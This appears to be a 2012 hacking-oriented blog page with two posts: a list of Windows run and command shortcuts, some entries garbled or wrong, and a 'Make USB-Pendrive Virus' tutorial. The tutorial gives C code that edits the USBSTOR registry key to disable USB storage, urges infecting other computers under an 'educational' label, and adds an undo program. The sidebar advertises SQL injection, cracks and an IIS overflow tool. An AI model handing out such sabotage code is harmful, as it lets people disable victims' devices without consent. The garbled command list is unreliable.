Ms Windows Support

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Monday, 17 September 2012

List of Command Prompt Commands

Posted on 12:51 by Unknown

:- Accessibility Options : access.cpl
:- Add Hardware: hdwwiz.cpl
:- Add / Remove Programs: appwiz.cpl
:- Administrative Tools : control admintools
:- Automatic Updates: wuaucpl.cpl
:- Wizard file transfer Bluethooth: fsquirt
:- Calculator: calc
:- Certificate Manager: certmgr.msc
:- Character: charmap
:- Checking disk : chkdsk
:- Manager of the album (clipboard) : clipbrd
:- Command Prompt : cmd
:- Service components (DCOM) : dcomcnfg
:- Computer Management : compmgmt.msc
:- DDE active sharing : ddeshare
:- Device Manager : devmgmt.msc
:- DirectX Control Panel (if installed) : directx.cpl
:- DirectX Diagnostic Utility : dxdiag
:- Disk Cleanup : cleanmgr
:- System Information=dxdiag
:- Disk Defragmenter : dfrg.msc
:- Disk Management : diskmgmt.msc
:- Partition manager : diskpart
:- Display Properties : control desktop
:- Properties of the display (2) : desk.cpl
:- Properties display (tab "appearance") : control color
:- Dr. Watson: drwtsn32
:- Manager vĂ©rirficateur drivers : check
:- Event Viewer : Eventvwr.msc
:- Verification of signatures of files: sigverif
:- Findfast (if present) : findfast.cpl
:- Folder Options : control folders
:- Fonts (fonts) : control fonts
:- Fonts folder windows : fonts
:- Free Cell ...: freecell
:- Game Controllers : Joy.cpl
:- Group Policy (XP Pro) : gpedit.msc
:- Hearts (card game) : mshearts
:- IExpress (file generator. Cab) : IExpress
:- Indexing Service (if not disabled) : ciadv.msc
:- Internet Properties : inetcpl.cpl
:- IPConfig (display configuration): ipconfig / all
:- IPConfig (displays the contents of the DNS cache): ipconfig / displaydns
:- IPConfig (erases the contents of the DNS cache): ipconfig / flushdns
:- IPConfig (IP configuration cancels maps): ipconfig / release
:- IPConfig (renew IP configuration maps) : ipconfig / renew
:- Java Control Panel (if present) : jpicpl32.cpl
:- Java Control Panel (if present) : javaws
:- Keyboard Properties: control keyboard
:- Local Security Settings : secpol.msc
:- Local Users and Groups: lusrmgr.msc
:- Logout: logoff
:- Microsoft Chat : winchat
:- Minesweeper (game): winmine
:- Properties of the mouse: control mouse
:- Properties of the mouse (2): main.cpl
:- Network Connections : control NetConnect
:- Network Connections (2): ncpa.cpl
:- Network configuration wizard: netsetup.cpl
:- Notepad : notepad
:- NView Desktop Manager (if installed): nvtuicpl.cpl
:- Manager links: packager
:- Data Source Administrator ODBC: odbccp32.cpl
:- Screen Keyboard: OSK
:- AC3 Filter (if installed) : ac3filter.cpl
:- Password manager (if present): Password.cpl
:- Monitor performance : perfmon.msc
:- Monitor performance (2): perfmon
:- Dialing Properties (phone): telephon.cpl
:- Power Options : powercfg.cpl
:- Printers and Faxes : control printers
:- Private Character Editor : eudcedit
:- Quicktime (if installed) : QuickTime.cpl
:- Regional and Language Options: intl.cpl
:- Editor of the registry : regedit
:- Remote desktop connection : mstsc
:- Removable Storage: ntmsmgr.msc
:- requests the operator to removable storage: ntmsoprq.msc
:- RSoP (traduction. ..) (XP Pro): rsop.msc
:- Scanners and Cameras : sticpl.cpl
:- Scheduled Tasks : control schedtasks
:- Security Center : wscui.cpl
:- Console management services: services.msc
:- shared folders : fsmgmt.msc
:- Turn off windows : shutdown
:- Sounds and Audio Devices : mmsys.cpl
:- Spider (card game): spider
:- Client Network Utility SQL server : cliconfg
:- System Configuration Editor : sysedit
:- System Configuration Utility : msconfig
:- System File Checker (SFC =) (Scan Now) : sfc / scannow
:- SFC (Scan next startup): sfc / scanonce
:- SFC (Scan each dĂ©marraget) : sfc / scanboot
:- SFC (back to default settings): sfc / revert
:- SFC (purge cache files): sfc / purgecache
:- SFC (define size CAHC x) : sfc / cachesize = x
:- System Properties : sysdm.cpl
:- Task Manager : taskmgr
:- Telnet client : telnet
:- User Accounts : nusrmgr.cpl
:- Utility Manager (Magnifier, etc) : utilman
:- Windows firewall (XP SP2) : firewall.cpl
:- Microsoft Magnifier: magnify
:- Windows Management Infrastructure: wmimgmt.msc
:- Protection of the accounts database: syskey
vWindows update: wupdmgr
:- Introducing Windows XP (if not erased) : tourstart
:- Wordpad : write
:- Date and Time Properties : timedate.cpl
Read More
Posted in Other | No comments

Make USB-Pendrive Virus

Posted on 12:37 by Unknown

Virus is a program which infects computer, in different way. I am explaining about a Virus Which can easily be made in C or C++, ,When we have run .exe file of this Pendrive-usb virus then when we connect pendrive with our computer usb,it will not be connected. Operating System would not be able to detect pendrive.

Code is written to directly change the usb registry option and change its key. Not going to explain about registry in detail now, later will explain.

1. Creating usb-pendrive Virus :-


:- Install Turbo C or C++
:- Open TC.exe and there write the coding


#include
void main()
{

system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet
\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
} 

:-  Above Line system(".....................");  it is in one Line
:-  Save The Above Program as usbblock.c or any other name.
:-  Compile and Run the above Program
:-  Congratulation! you are succesfull to create the usb-pendrive Virus
:-  to drive where C is installed (Open TC folder) and then BIN ,have that usb-pendrive virus usbblock.exe to be used..........
Run that usbblock.exe in your computer to test.
:-  Pendrive to your computer usb ....OH! Shit Pendrive doesn't get detected...virus
:-  fect any other computer as it is only for educational purpose.


2. To reverse the effect of USB-Pendrive Virus (Removal of that Virus) :-

:-  Install Turbo C or C++
:-  Open TC.exe and there write the coding

#include
void main()
{

system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\
Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
} 

Above Line system("....................."); it is in one Line


:-  Save The Above Program as unblockusb.c or any other name.
:-  Compile and Run the above Program
:-  Congratulation! you are succesfull to create .exe file to unblock USB
:-   Now go to drive where C is installed (Open TC folder) and then BIN ,have that unblockusb.exe to be used.......... 
:-  Run that unblockusb.exe to reverse the effect of usbblock.exe.






Read More
Posted in Virus | No comments
Newer Posts Older Posts Home
Subscribe to: Posts (Atom)

Popular Posts

  • How To Hack website With SQL Injection : Full Tutorial
    I'm posting this here coz this tut explains everything step by step. but most of the sql tuts ends when we find the password hash. So ne...
  • Virtual pdf printer with crack
    convert ur print in pdf file by using Virtual PDF Printer Virtual PDF Printer simplifies the process of creating PDF document. Usually PDF d...
  • How to make windows xp bootbal pen drive in one click
    windows xp by sumit.exe download format tool.exe download step-1 Insert windows xp cd in dvd drive and a minimum 1Gb pendrive insert in usb ...
  • List of Command Prompt Commands
    :- Accessibility Options : access.cpl :- Add Hardware: hdwwiz.cpl :- Add / Remove Programs: appwiz.cpl :- Administrative Tools : control adm...
  • Hacking The Art of Exploitation 2nd Edition !! jon erickson
    Hacking: The Art of Exploitation, 2nd Edition Published:2012 | ePub & mobi & pdf | 488 Pages | 14 Mb Book Description Hacking is th...
  • How To Make Windows vista/7/8 Bootbal Pen Drive In One Click
    windows cd to usb.exe download format tool.exe download step-1 Insert windows 7 cd in dvd drive and a 4Gb pendrive insert in usb port step...
  • Hacking for Dummies: test network security !! Stuart McClure
    Hacking for Dummies: Test Network Security Published: 2004 | 387 Pages | PDF |SIZE 10 MB Book Description A new edition of the bestselling g...
  • Designing BSD Rootkits An Introduction to Kernel Hacking !! Joseph Kong
    Designing BSD Rootkits An Introduction to Kernel Hacking Published: 2007 | ISBN10 1593271425 | 144 Pages | PDF |SIZE 8 MB Book Description T...
  • PowerISO v5.5 Final With Key !! Crack
    PowerIso poweriso v5.5 | size 5.4 MB ================ [Software INFO:] ================ New Features in v5.4:- Improve user interface Suppor...
  • How To Hack Web Servers - tutorial
    Hacking Tool: IISHack.exe iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed. c:\ iishack ...

Categories

  • book
  • coding
  • CRACKS
  • Game
  • hacking
  • Hacking Tutorials
  • Other
  • software
  • SOLUTIONS
  • Unlock Datacard
  • Utility
  • Virus

Blog Archive

  • ►  2013 (23)
    • ►  December (1)
    • ►  July (18)
    • ►  May (1)
    • ►  March (3)
  • ▼  2012 (27)
    • ►  November (2)
    • ▼  September (2)
      • List of Command Prompt Commands
      • Make USB-Pendrive Virus
    • ►  August (4)
    • ►  July (3)
    • ►  March (2)
    • ►  February (2)
    • ►  January (12)
Powered by Blogger.

About Me

Unknown
View my complete profile